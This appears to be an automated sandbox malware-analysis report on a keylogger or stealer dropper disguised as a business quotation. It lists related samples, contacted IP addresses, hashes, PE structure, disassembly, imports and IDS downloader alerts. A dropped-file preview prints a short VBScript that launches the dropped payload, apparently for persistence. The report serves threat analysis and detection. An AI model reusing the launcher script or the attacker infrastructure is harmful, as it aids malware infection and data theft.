                                                                                                                  QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 132.226.8.169
                                                                                                                  PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 132.226.8.169
                                                                                                                  QUOTATION#090125-ELITEMARINE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 132.226.247.73
                                                                                                                  Order_list.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 132.226.247.73
                                                                                                                  PUBLIC-DOMAIN-REGISTRYUShttp://www.techigent.inGet hashmaliciousUnknownBrowse
                                                                                                                  • 103.21.59.80
                                                                                                                  QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 208.91.199.223
                                                                                                                  Xre0Nmqk09.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                  • 162.251.80.30
                                                                                                                  8BzIVoQT3w.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                  • 199.79.62.115
                                                                                                                  EpH9QFlrm2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                  • 199.79.62.115
                                                                                                                  PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 208.91.199.223
                                                                                                                  Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 208.91.199.223
                                                                                                                  PO23100076.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                                  • 199.79.62.115
                                                                                                                  ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 208.91.198.176
                                                                                                                  document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 208.91.199.225
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  54328bd36c14bd82ddaa0c04b25ed9adConfirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  50201668.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  MB263350411AE_1.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  ABG Draft.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  tN8GsMV1le.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  rOrders.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                  • 104.21.96.1
                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0eEspPrivStoreAtt116.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  SPOOOFER776.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  PlusPrivStoreAtt116.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  AimPrivStoreAtt117.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  EspPrivStoreAtt116.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  SPOOOFER776.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  http://www.brillflooring.comGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  PlusPrivStoreAtt116.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  AimPrivStoreAtt117.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  Confirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  No context
Process: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe
File Type: data
Category: dropped
Size (bytes): 278016
Entropy (8bit): 7.004191216418647
Encrypted: false
SSDEEP: 6144:IQspcIbydOalyEUSazBUbfZFm7k8MstkTUAK1Wi1S5t62B1lqNLB8RiqynGMTKCs:qpcI4gYfJ7AFLLu
MD5: EBAEEBDF8F7A3A2FA06F0BC0F8442A4C
SHA1: F880BA3FDA3A25CBBD28768A2C5108039F07389E
SHA-256: C1FDF623718DCBFEEEBEC04B3617C4D6212ECFA2396F584A666B4F43F923848B
SHA-512: 75C49BFF28F10D012117C0894F72A83E2B8B758C1E68011CC362EEBCA3080F6792DA3A2D3AB07AE1E995E48938E75253FA46FE35E628E809D314DBBFD5B17CE7
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1586688
Entropy (8bit): 7.403510543980337
Encrypted: false
SSDEEP: 24576:aqDEvCTbMWu7rQYlBQcBiT6rprG8an1jKpXvJZEWWNbD39MLJO2QfqVbW9:aTvC/MTQYxsWR7anGJqDuLxrVbW
MD5: F8410BCD14256D6D355D7076A78C074F
SHA1: 7FF600A40521FB8267FD305F601832785F975D40
SHA-256: 7E9B9833268DAE6E33C83B582EC7FB353F0DC6514F869E3228F0EFFA161DA00F
SHA-512: 9E32B73669491BB42074018C52FFAECC415E9F24DC4FCFCD346DA8E8665E89F27C2CAAAD777294EAD64668F1E264D27D4797F28A5A1B5E58937CDEFE45B63019
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 39%
Reputation: low
                                                                                                                  Process:C:\Users\user\AppData\Local\supergroup\ageless.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):274
                                                                                                                  Entropy (8bit):3.3988741536694866
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:DMM8lfm3OOQdUfclq7UEZ+lX1WlQfSMlm6nriIM8lfQVn:DsO+vNlq7Q1zakm4mA2n
                                                                                                                  MD5:FD7F0BFB3B154E251C51D95121B7402E
                                                                                                                  SHA1:7AEB1D01DA3E9B15C68989F469BEBC3389E62FA8
                                                                                                                  SHA-256:06111E35A3B26AB871609F52DB7A40E502CDFEB70F53185118E128E95F71FFF1
                                                                                                                  SHA-512:E11EA83F4236CCE3FE00B84632EA252238DD85200DC99DA435ECBC49B603716355A6FA5A4B70FBD93EA9810BB0EA942CB4580B397CFFE5E9877ED81EC7ACDF9D
                                                                                                                  Malicious:true
                                                                                                                  Reputation:low
Preview (UTF-16LE text, decoded):
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "C:\Users\brok\AppData\Local\supergroup\ageless.exe", 1
Set WshShell = Nothing
                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):7.403510543980337
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:QUOTATION REQUIRED_Enatel s.r.l..exe
                                                                                                                  File size:1'586'688 bytes
                                                                                                                  MD5:f8410bcd14256d6d355d7076a78c074f
                                                                                                                  SHA1:7ff600a40521fb8267fd305f601832785f975d40
                                                                                                                  SHA256:7e9b9833268dae6e33c83b582ec7fb353f0dc6514f869e3228f0effa161da00f
                                                                                                                  SHA512:9e32b73669491bb42074018c52ffaecc415e9f24dc4fcfcd346da8e8665e89f27c2caaad777294ead64668f1e264d27d4797f28a5a1b5e58937cdefe45b63019
                                                                                                                  SSDEEP:24576:aqDEvCTbMWu7rQYlBQcBiT6rprG8an1jKpXvJZEWWNbD39MLJO2QfqVbW9:aTvC/MTQYxsWR7anGJqDuLxrVbW
                                                                                                                  TLSH:C275D0027381C062FFAB92734F5AF6515BBC69260123E62F13981D7ABD701B1563E7A3
                                                                                                                  File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                                                                  Icon Hash:aaf3e3e3938382a0
                                                                                                                  Entrypoint:0x420577
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x67864233 [Tue Jan 14 10:53:39 2025 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:1
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:1
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:1
                                                                                                                  Import Hash:948cc502fe9226992dce9417f952fce3
                                                                                                                  Instruction
                                                                                                                  call 00007F03A47B7573h
                                                                                                                  jmp 00007F03A47B6E7Fh
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                  mov esi, ecx
                                                                                                                  call 00007F03A47B705Dh
                                                                                                                  mov dword ptr [esi], 0049FDF0h
                                                                                                                  mov eax, esi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  retn 0004h
                                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                                  mov eax, ecx
                                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                                  mov dword ptr [ecx+04h], 0049FDF8h
                                                                                                                  mov dword ptr [ecx], 0049FDF0h
                                                                                                                  ret
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                  mov esi, ecx
                                                                                                                  call 00007F03A47B702Ah
                                                                                                                  mov dword ptr [esi], 0049FE0Ch
                                                                                                                  mov eax, esi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  retn 0004h
                                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                                  mov eax, ecx
                                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                                  mov dword ptr [ecx+04h], 0049FE14h
                                                                                                                  mov dword ptr [ecx], 0049FE0Ch
                                                                                                                  ret
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  mov esi, ecx
                                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                                  mov dword ptr [esi], 0049FDD0h
                                                                                                                  and dword ptr [eax], 00000000h
                                                                                                                  and dword ptr [eax+04h], 00000000h
                                                                                                                  push eax
                                                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                                                  add eax, 04h
                                                                                                                  push eax
                                                                                                                  call 00007F03A47B9C1Dh
                                                                                                                  pop ecx
                                                                                                                  pop ecx
                                                                                                                  mov eax, esi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  retn 0004h
                                                                                                                  lea eax, dword ptr [ecx+04h]
                                                                                                                  mov dword ptr [ecx], 0049FDD0h
                                                                                                                  push eax
                                                                                                                  call 00007F03A47B9C68h
                                                                                                                  pop ecx
                                                                                                                  ret
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  mov esi, ecx
                                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                                  mov dword ptr [esi], 0049FDD0h
                                                                                                                  push eax
                                                                                                                  call 00007F03A47B9C51h
                                                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                                                  pop ecx
                                                                                                                  Programming Language:
                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                  • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0xaca28 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x181000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0xaca28 | 0xacc00 | e36154ed43ec940a9de96b4fd86bd35f | False | 0.9617628437047757 | data | 7.960649892633962 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x181000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc7b8 | 0xa3cf0 | data | | | 1.0003144747824013
RT_GROUP_ICON | 0x1804a8 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x180520 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x180534 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x180548 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x18055c | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x180638 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, 
AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                                                                  GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                                                                  SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                                                  OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken | Map
English | Great Britain | (map image not included)
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-14T16:57:18.409625+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49754 | 132.226.247.73 | 80 | TCP
2025-01-14T16:57:19.378341+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49754 | 132.226.247.73 | 80 | TCP
2025-01-14T16:57:20.013836+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49766 | 104.21.96.1 | 443 | TCP
